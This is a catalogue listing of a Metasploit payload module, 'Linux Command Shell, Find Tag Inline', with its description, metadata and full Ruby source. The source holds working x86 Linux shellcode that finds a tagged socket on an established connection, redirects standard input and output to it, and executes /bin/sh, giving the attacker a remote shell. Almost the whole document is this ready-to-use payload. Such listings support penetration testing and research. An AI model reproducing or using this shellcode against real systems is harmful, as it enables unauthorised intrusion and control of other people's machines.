Linux Command Shell, Find Tag Inline

2005-07-19T14:33:25
ID MSF:PAYLOAD/LINUX/X86/SHELL_FIND_TAG
Type metasploit
Reporter Rapid7
Modified 2017-07-24T13:26:21

Description

Spawn a shell on an established connection (proxy/nat safe)

                                        
                                            ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core/handler/find_tag'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'

module MetasploitModule

  CachedSize = 69

  include Msf::Payload::Single
  include Msf::Payload::Linux
  include Msf::Sessions::CommandShellOptions

  def initialize(info = {})
    super(merge_info(info,
      'Name'          => 'Linux Command Shell, Find Tag Inline',
      'Description'   => 'Spawn a shell on an established connection (proxy/nat safe)',
      'Author'        => 'skape',
      'License'       => MSF_LICENSE,
      'Platform'      => 'linux',
      'Arch'          => ARCH_X86,
      'Handler'       => Msf::Handler::FindTag,
      'Session'       => Msf::Sessions::CommandShellUnix,
      'Payload'       =>
        {
          'Offsets' =>
            {
              'TAG' => [ 0x1a, 'RAW' ],
            },
          'Payload' =>
            "\x31\xdb\x53\x89\xe6\x6a\x40\xb7\x0a\x53\x56\x53\x89\xe1\x86\xfb" +
            "\x66\xff\x01\x6a\x66\x58\xcd\x80\x81\x3e\x6d\x73\x66\x21\x75\xf0" +
            "\x5f\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b" +
            "\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52" +
            "\x53\x89\xe1\xcd\x80"
        }
      ))
  end

  #
  # Ensures the setting of TAG to a four byte value
  #
  def generate
    datastore['TAG'] = _find_tag

    super
  end
end